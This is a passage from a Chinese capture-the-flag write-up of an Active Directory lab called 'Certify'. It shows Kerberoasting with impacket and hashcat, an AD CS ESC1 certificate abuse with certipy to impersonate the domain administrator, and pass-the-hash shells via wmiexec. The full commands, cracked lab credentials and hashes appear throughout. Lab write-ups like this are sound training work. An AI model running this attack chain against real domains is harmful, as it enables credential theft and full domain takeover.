权限高(有的甚至是 Domain Admin)
密码长期不变(运维习惯问题)
被多个关键服务使用
一旦破解成功,攻击者就能利用这个账号横向移动、提升权限。
🔹 典型攻击流程(简化版)
枚举 SPN → 确定域里有哪些服务账号。
请求 TGS(服务票据)。
导出票据 → 保存为 hash 格式。
离线暴力破解 → 得到账户明文密码。
用该账号进行进一步的横向/提权。
🔹 防御与缓解(蓝队视角)
强密码策略:服务账号必须设置高复杂度密码,并定期更换。
分级账户:避免用高权限账号直接跑服务。
监控异常票据请求:大量 TGS 请求、非预期的票据导出操作可触发告警。
最小权限原则:服务账号不应有超出必要的域权限。
启用托管服务账号 (gMSA):它能自动更换密码,避免长期弱口令。
✅ 一句话总结:
Kerberoasting 攻击就是利用 Kerberos 的正常票据请求流程,获取服务账号的加密票据,再离线破解,进而拿到高价值账号密码。
SPN
proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
┌──(root㉿kali-plus)-[~/Desktop/kali/HackTheBox/Certify]
└─# proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:88 ... OK
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$f54cc8fd7b872b44b5bff49640e91645$3f354e9d4663a5a467225b991205113741c89fc8a21742f39f293ad4e652efc27626595c6c8413773955d70761385dcd38bf01f9b921f76739462a937b19249d4638addcb43eb2bef49a05e5bc68a3850eb333e3a0469e00a7c2242f95d73a6416af814773a3ccc51ed325021f9b15acc86e8a5a02186df3181b091e27daef968c9b373bc76fc92dec6c9f8cfbf75023482a5dba3a9534a8969d0d030c2906785a4b1bd0618035ed71ac327033b2ba55cc686b973fcc15ab5dba11381b2c31adcccd82f702fa9b6d1d3e0b9118fb2f3162b866f81ab1a24a6ed4cac217a190f53ac27a1760cb3ef991b0ffcaafeaeec02191b7203ac4921175f398121d92194c8d9b5ab52abf047d60b227ba0bb41574d61f7b6bfb00a6e5d03e5511f47903ad73eee61755fce4434ea3a9ce79d42edb64502ef388413eeb4d97c67cdb18b965976acb715336f77aad7595b344e9c953bb3bb50522ec242ab6f634359459255c52fbdbe0293f98209dc01cb1aba9a3dc05ea8b909706cbd3dd7102033cd8ab16ba3ca70534ef1aed7704e68a1a7aff222890cd29c5d700d29811d31133a4014bc8c330825e36022d2358635eae6d9564bcf6bc4134de676005d0bf54a9c85b298bb92e8910d7ae671adcb6f3d4cd770198fcecb9bd44f6df2777679619d4ffc5200d4c7ae1bbe075e660c44f640bfd2cbc0bff1aaf15270e11549ef167e0bc6e43012f3ff6799d9d8e51d5c9bb602838902c171dfc2458a1ba5a84e2bd4081af8266cf8bcc6eba29f727288909b52d6c01c0a9fc5f0570a1520d970a7b22b842abf33447c972f3e12cf7a419263c34c6fb30bc0da8e220f0c9cb1affb966a2e5169e0b116e90ab3e8167fe55bfef85f787729b3c63ea15862073e7ed943f511f5c8c1aaa422aec6fde8d876359734bcbe5de15dd3c98fb96f0eb8b6183c895346b3b2eef36e1cae52605fe9125156038a008a5438d925c4142b0a7cf007709a9720e70fd343d8b61d07f3d765deca8ded922cdfbd06e4ee857f92e5357195c35955fa0f7ab844ab4515e4b42249d6e4cdcaee156ac860c555faee1f43ee93713ddc7fe44476507fae7ad4f65c78470c634ad2d200f779e2e68b3c2d3e025a8ce8aab4b922f3bbd4d17e604ae97f94033ca8c80936f473494cf2350392be7076a75603977ae89e877ea0d4f3dffca691c0757e410a5f2d593e176845820f785b415547f41a2938e42eb88f9c8903d0fff774c28599f828edeb08ac3c756be1a1bfb189c86d8df66b4699bad7d481c7436813ddb6f9c533f405f88cac79312c3fdd561b5fa8a5c30ef7b3c71b6cf04ef75b35bdae6f228422b64c6780740786cc274ee067e670d225b8935c89bebf263e9b736d830983afe88459dcb75dd94dfc2100f748e47bbfbb2394205fb94c4f4d4ad1095b57e5804229c07d4fc03dd457211fe0d63dad90168a9fcede26346d52952bb07a5d8694b8910dec02fb3777718978da942e457de20e564ae1361d9
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:88 ... OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$2547cc9cb294457f281ea0587c5a6e99$b3dcf0906c98f4e554e3c0d8d19035e01d6ee0ceaa871ff2b7bf9ca75340c06d919e262c1590278ba2f7b132df67829b17d229993936097f2ba7c3ed1f558ce98d280878d143b7e94834a58f5d0a7cd4803cbca98438e70123dd02624b3f1b6b3ab6184c3cbbfe678148d05edff706004f05d734840ba6df29c478766b475bc8325d8371ef3ffe95bafc9fd74a2d0d2171f6dad639c50869968eaa397d5f68edda9aab0edce5dabc5437206c45aac7fa0fb16669dfeed62e55b58969c06e2629f032886de1f677bcbd406fddce02d59faf82165ce15ff4cc8089c300565a5b945b8688bcdcce3207d536173fe6db00c58d19d24e69907065d2fe9fc96c5ee23935a943ece9d32e62a4d6511ce0d51618ab9b5553879097accacdea0d6145aa88babd2180395a1d2b0ade6beb3265867897dac599dc8e44b4b906b080be1b83fd7ce923681222480a056637bae173d6e93d2ebca47d4de457d752d6d3d19e0bb75fc4732c6f7160a203773d420cc47e230f1bff56dad8fc15af6e4bde5cf6803d31af4eb11881a1dfb022cec44539a1c1e1237c4c940648452d2f2830895e7716a7eb925f81379524659d9b10d0dde07984d7466fb6f21c9a8fb4a66b8118009575332e8785f43afd87007ea90ee990d62c62d40644a1cc511de4e4ef2536da50144f5210a84d2a3d9124332b4800cfbf7c1773be627be068c0c20f2100ab8c3efba3db9fda17a03475c77aa126e15c922cac15fc94797ff6b7ad54c03e4763ae49ffa140a1823a8b2578f0eb662b2e7b21b96503c3f3dec4d43c4ac525356fa61f1f247a5447db229212286684c93289c4318387135590a56dffa930e4b22f52319327da068e7a5b14b70bf2e5bb18577b0dde4e13c613f8480098cbe7155c5dbd9e2653008d2bcdf98dbbcb3029cb91fc3f886f430bfd61a23d9ef427aa0a47bee54b62e07d2d0e885984b1d2dfbba2c3455fbbbb2fa8fc830db16d016d3653fa17631bf2c5bd386673bbef39b666ddc0fb98db54f61b4ca22e74d2b36db958e7b8a48da8d6d5a70f55dcc6b78fe1105b656f3bc0be6ce1b8e5345c4a94b477374e79a10e292a9fb15e4421f87bf35b940dd37b5f74b53184a453fe0b12519f2bb642e67e09099ff858bf93bba14df6dcbb52d5055fe5dbc4a09b14d3e69d78d317be19a104961d6fb408bd987fba1816b1f3f5f7f932fbc5c41712a761640d577811537626563c1b9dfbbc77efb1734e54f6d4c1f5f1236ffd6ddc29db14399ac712bf856ee1464b0f07c957125ff1b46d993f5eaa1ddb779847c78fdc28ecfe5bc2caa8f47e24431813355da8e65e2812db84c901bcc31b8d1110752df4d99cb428cdcb2498d9ff969f053423a5a302d769d89610461515be28abbfc3db0d4355a537134befd6be9e0bcd791dc5cd1b4b33cb4d985fe434d689d63900f3c0c4ed48c31355e3e679a4f9bb49de7599638e26c175c955403f5c4ff54fe301bf95976ba8d368db0625d5bade8846zhangjian:i9XDE02pLVf
liupeng:fiAzGwEMgTYhash.txt如下
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$f54cc8fd7b872b44b5bff49640e91645$3f354e9d4663a5a467225b991205113741c89fc8a21742f39f293ad4e652efc27626595c6c8413773955d70761385dcd38bf01f9b921f76739462a937b19249d4638addcb43eb2bef49a05e5bc68a3850eb333e3a0469e00a7c2242f95d73a6416af814773a3ccc51ed325021f9b15acc86e8a5a02186df3181b091e27daef968c9b373bc76fc92dec6c9f8cfbf75023482a5dba3a9534a8969d0d030c2906785a4b1bd0618035ed71ac327033b2ba55cc686b973fcc15ab5dba11381b2c31adcccd82f702fa9b6d1d3e0b9118fb2f3162b866f81ab1a24a6ed4cac217a190f53ac27a1760cb3ef991b0ffcaafeaeec02191b7203ac4921175f398121d92194c8d9b5ab52abf047d60b227ba0bb41574d61f7b6bfb00a6e5d03e5511f47903ad73eee61755fce4434ea3a9ce79d42edb64502ef388413eeb4d97c67cdb18b965976acb715336f77aad7595b344e9c953bb3bb50522ec242ab6f634359459255c52fbdbe0293f98209dc01cb1aba9a3dc05ea8b909706cbd3dd7102033cd8ab16ba3ca70534ef1aed7704e68a1a7aff222890cd29c5d700d29811d31133a4014bc8c330825e36022d2358635eae6d9564bcf6bc4134de676005d0bf54a9c85b298bb92e8910d7ae671adcb6f3d4cd770198fcecb9bd44f6df2777679619d4ffc5200d4c7ae1bbe075e660c44f640bfd2cbc0bff1aaf15270e11549ef167e0bc6e43012f3ff6799d9d8e51d5c9bb602838902c171dfc2458a1ba5a84e2bd4081af8266cf8bcc6eba29f727288909b52d6c01c0a9fc5f0570a1520d970a7b22b842abf33447c972f3e12cf7a419263c34c6fb30bc0da8e220f0c9cb1affb966a2e5169e0b116e90ab3e8167fe55bfef85f787729b3c63ea15862073e7ed943f511f5c8c1aaa422aec6fde8d876359734bcbe5de15dd3c98fb96f0eb8b6183c895346b3b2eef36e1cae52605fe9125156038a008a5438d925c4142b0a7cf007709a9720e70fd343d8b61d07f3d765deca8ded922cdfbd06e4ee857f92e5357195c35955fa0f7ab844ab4515e4b42249d6e4cdcaee156ac860c555faee1f43ee93713ddc7fe44476507fae7ad4f65c78470c634ad2d200f779e2e68b3c2d3e025a8ce8aab4b922f3bbd4d17e604ae97f94033ca8c80936f473494cf2350392be7076a75603977ae89e877ea0d4f3dffca691c0757e410a5f2d593e176845820f785b415547f41a2938e42eb88f9c8903d0fff774c28599f828edeb08ac3c756be1a1bfb189c86d8df66b4699bad7d481c7436813ddb6f9c533f405f88cac79312c3fdd561b5fa8a5c30ef7b3c71b6cf04ef75b35bdae6f228422b64c6780740786cc274ee067e670d225b8935c89bebf263e9b736d830983afe88459dcb75dd94dfc2100f748e47bbfbb2394205fb94c4f4d4ad1095b57e5804229c07d4fc03dd457211fe0d63dad90168a9fcede26346d52952bb07a5d8694b8910dec02fb3777718978da942e457de20e564ae1361d9hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt 
账号/密码:zhangjian/MyPass2@@6proxychains4 xfreerdp /v:172.22.9.26 \
/u:zhangxia /d:xiaorang.lab /p:'MyPass2@@6' \
/sec:nla /cert:ignore /tls-seclevel:0 \
/drive:share,/home/kali/Desktop/tmpESC1
这里先查询漏洞,直接爆出来ESC1
proxychains certipy-ad find -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdoutcertipy-ad是什么
certipy-ad 是一款专门针对 Active Directory 证书服务(AD CS) 的攻击/利用工具。它是 Pentester / Red Team / CTF 常用的工具之一。
它能做什么
主要围绕 Windows 域环境的证书服务漏洞 展开,比如:
枚举 (Enumeration)
枚举域控里部署的证书颁发机构 (CA)
枚举证书模板 (Certificate Templates)
查看哪些模板可被普通用户申请,哪些配置有风险
漏洞检测 (Vulnerabilities)
检测证书模板里是否有配置错误(比如
ENROLLEE_SUPPLIES_SUBJECT),导致用户能申请别人身份的证书检查证书权限配置,是否存在 ESC1 ~ ESC13 类攻击向量
利用 (Exploitation)
申请高权限账号的证书(例如域管),再用该证书进行身份冒充
导出 PFX 证书文件,用来做 Kerberos 身份验证或远程登录
结合 Rubeus / mimikatz 可以拿到 TGT 或直接 RDP
后渗透 (Post-Exploitation)
使用伪造的证书获取 域管理员权限
横向移动(Pass-the-Certificate / Pass-the-Ticket)
为什么重要
在真实企业域环境中,很多管理员部署了 Active Directory Certificate Services (AD CS) 却配置不当,结果导致低权限域用户可以通过证书链条直接“提权到域管”。
Certipy 就是把这些 复杂的手工攻击步骤自动化,所以它是红队和渗透测试必备工具。
常见用法举例
# 枚举 AD CS 配置和模板
certipy-ad find -u 'user@domain.local' -p 'Password123' -dc-ip 10.0.0.1 -vulnerable
# 申请一个证书
certipy-ad req -u 'user@domain.local' -p 'Password123' -ca CA_NAME -template TEMPLATE_NAME
# 将证书转成可用的 PFX
certipy-ad req -u 'user@domain.local' -p 'Password123' -ca CA_NAME -template TEMPLATE_NAME -upn 'administrator@domain.local' -key-size 4096
🔑 一句话总结:certipy-ad 就是用来在 域环境中攻击和利用证书服务 (AD CS) 的工具
┌──(root㉿kali-plus)-[~]
└─# proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:636 ... OK
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.402 seconds: Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:445 ... OK
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'xiaorang-XIAORANG-DC-CA'
[*] Checking web enrollment for CA 'xiaorang-XIAORANG-DC-CA' @ 'XIAORANG-DC.xiaorang.lab'
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:80 ... OK
[proxychains] Strict chain ... VPSIP:5001 ... 172.22.9.7:443 <--socket error or timeout!
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : XIAORANG.LAB\Administrators
Access Rights
ManageCa : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
ManageCertificates : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Enroll : XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-14T04:51:15+00:00
Template Last Modified : 2023-07-14T04:51:44+00:00
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Full Control Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Property Enroll : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
[+] User Enrollable Principals : XIAORANG.LAB\Domain Users
XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx,然后利用administrator.pfx证书获取 TGT 和 NTLM Hash
但是要注意,要改一下hosts,不然会超时
proxychains certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab好的,我们逐段拆开这条命令,让你一眼就能看懂它的作用:
proxychains certipy-ad req \
-u 'liupeng@xiaorang.lab' \
-p 'fiAzGwEMgTY' \
-target 172.22.9.7 \
-dc-ip 172.22.9.7 \
-ca "xiaorang-XIAORANG-DC-CA" \
-template 'XR Manager' \
-upn administrator@xiaorang.lab
proxychains
→ 让所有流量通过代理(通常是 SOCKS5,HTB/CTF 场景常见),保证能连上目标域控。certipy-ad req
→certipy-ad的 证书申请 (request) 模块,用来向 CA 请求一个证书。-u 'liupeng@xiaorang.lab'
→ 用哪个域用户账号去申请证书。这里是 liupeng。-p 'fiAzGwEMgTY'
→ 对应的用户密码。-target 172.22.9.7
→ 指定目标 CA 服务所在的主机(通常是域控 / CA 服务器)。-dc-ip 172.22.9.7
→ 指定域控 IP,用于 LDAP 查询和身份验证,避免本地 DNS 出错。-ca "xiaorang-XIAORANG-DC-CA"
→ 指明要使用的证书颁发机构 (Certificate Authority, CA) 名称。这个名字可以通过
certipy find枚举到。-template 'XR Manager'
→ 指定证书模板。
如果这个模板配置不当(例如允许用户自己指定 UPN),就可能造成权限提升漏洞。-upn administrator@xiaorang.lab
→ 关键点!告诉 CA:我申请的证书要绑定的身份是 域管理员 administrator。
如果模板配置不安全,CA 会给你发一个“能冒充管理员”的证书。
你用低权限域用户 liupeng 的账号,通过代理去连上域控 172.22.9.7,向域内的 CA xiaorang-XIAORANG-DC-CA 提交一个证书申请。
但是你不是申请自己的证书,而是利用证书模板 XR Manager 的不安全配置,强行申请一个属于 administrator@xiaorang.lab 的证书。
⚡ 如果申请成功,你就拿到了域管理员的 PFX 证书,接下来可以:
导出并加载证书
使用 Kerberos 认证直接获取 TGT(域管票据)
RDP/WinRM 登录域控,等于拿到域管权限
👉 总结一句话:
这条命令就是利用 AD CS 的模板配置漏洞,尝试用普通用户 liupeng 去“申请”一个 administrator 的证书,一旦成功,你就能伪装成域管。
proxychains certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7这条命令是 Certipy-AD 的认证功能,配合你之前申请到的 域管证书 (administrator.pfx) 来完成“冒充域管”的登录。
proxychains
→ 仍然通过代理发流量(保证能访问 HTB/内网域控)。certipy-ad auth
→ Certipy 的 认证模块。作用是利用证书 (PFX 文件) 与域控进行身份验证,并获取 Kerberos TGT / NT hash 等凭据。-pfx administrator.pfx
→ 你之前用req成功申请下来的证书文件(包含私钥和公钥),相当于“域管的身份证”。-dc-ip 172.22.9.7
→ 指定要和哪个域控通信,避免 DNS 解析失败。
Certipy 会使用 administrator.pfx 证书向 KDC(域控)发起认证。
如果成功,域控认为你就是
administrator@xiaorang.lab。工具会输出:
NT hash(相当于域管的密码 hash)
或者直接获取一个 TGT (Ticket Granting Ticket),可导入后用来访问服务
之后你就能用这些凭据去:
Pass-the-Hash / Pass-the-Certificate
RDP、SMB、WinRM 等远程登录
继续横向渗透
把证书转成 hash,用 impacket 登录:
proxychains certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7 -username administrator -domain xiaorang.lab输出 NTLM hash 后,你可以用:
proxychains psexec.py administrator@172.22.9.7 -hashes :<NT_HASH>直接拿 Kerberos TGT 用 klist 查看:
export KRB5CCNAME=administrator.ccache klistRDP 登录(用证书换来的票据):
proxychains xfreerdp /u:administrator /d:xiaorang.lab /pth:<NT_HASH> /v:172.22.9.7
✅ 一句话总结:
这条命令就是用你伪造出来的 administrator.pfx 证书去和域控进行身份认证,从而获得域管的“门票”(hash 或 Kerberos TGT),相当于彻底变成了域管。
要不要我帮你整理一个 完整攻击链流程图(从普通用户 → Certipy → 拿到域管证书 → auth → 登录域控)?
成功拿下域管hash
'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80域管hash打pth
proxychains wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/Administrator@172.22.9.26 -codec gbk
proxychains wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
# 这俩直接getshelltype Users\Administrator\flag\flag03.txt
type Users\Administrator\flag\flag04.txt
参考文章:
https://www.cnblogs.com/fdxsec/p/17973370
https://fushuling.com/index.php/2023/10/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7certify/
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 N1tols
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果